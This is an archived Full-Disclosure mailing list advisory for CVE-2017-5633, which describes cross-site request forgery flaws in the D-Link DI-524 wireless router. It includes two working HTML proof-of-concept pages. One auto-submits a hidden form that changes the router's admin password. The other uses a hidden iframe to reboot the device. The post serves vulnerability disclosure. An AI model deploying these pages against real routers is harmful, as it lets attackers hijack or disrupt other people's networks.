| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAETDBSCJZoPGdTMkNAM5E2TomafwiG=e8v_T_pmfV7kjAYKycg@mail.gmail.com> Date: Mon, 27 Feb 2017 19:20:49 -0300 From: Felipe Soares de Souza <fsouza.researcher@...il.com> To: fulldisclosure@...lists.org Subject: [FD] D-link wireless router DI-524 – Multiple Cross-Site Request Forgery (CSRF) vulnerabilities Title: ==== D-link wireless router DI-524 – Multiple Cross-Site Request Forgery (CSRF) vulnerabilities Credit: ====== Name: Felipe de Souza Date: ===== 27-02-2017 Reference: ===== CVE-2017-5633 Vendor: ====== D-Link is the global leader in connectivity for small, medium and large enterprise business networking. Product: ======= D-Link DI-524 wireless router Product link: https://dlink.com.br/produto/di-524150 Abstract: ======= Cross-Site Request Forgery (CSRF) vulnerability in the D-LINK DI-524 wireless router enables an attacker to perform [1]device reboot, [2]change the admin password, [3]possibly have unspecified other impacts via crafted requests. Affected Version: ============= 9.01 Exploitation-Technique: =================== Remote Details: ======= An attacker who lures a D-Link DI-524 authenticated user to browse a malicious website or clicking in a crafted url can exploit cross site request forgery (CSRF). The attacker could changing the admin password or rebooting the device. Proof Of Concept: ================ [1] User login to DI-524 wireless router [2] User visits the attacker's malicious web page or clicking in a crafted link (exploit01.html | exploit02.html) [3] (exploit01.html) changes the admin password, (exploit02.html)cause device reboot. Exploit (exploit01.html): <html> <head> <title>CSRF - Change admin account</title> </head> <body> <form method="POST" action="http://192.168.0.1/cgi-bin/pass"> <input type="hidden" name="rc" value="@atbox"> <input type="hidden" name="Pa" value="ATTACKER"> <input type="hidden" name="p1" value="ATTACKER"> </form> <script type="text/javascript"> document.forms[0].submit(); </script> </body> </html> Exploit (exploit02.html): <html> <head> <title>CSRF - Reboot the device</title> </head> <body> <iframe width="1" height="1" src=" http://192.168.0.1/cgi-bin/dial?rc=@&A=H&M=0&T=2000&rd=status"> </iframe> </body> </html> Credits: ======= Felipe de Souza - Network Analyst & Programmer twitter: https://twitter.com/felipes01 Linkedin: https://br.linkedin.com/in/felipe-soares-de-souza-a4332b33 _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists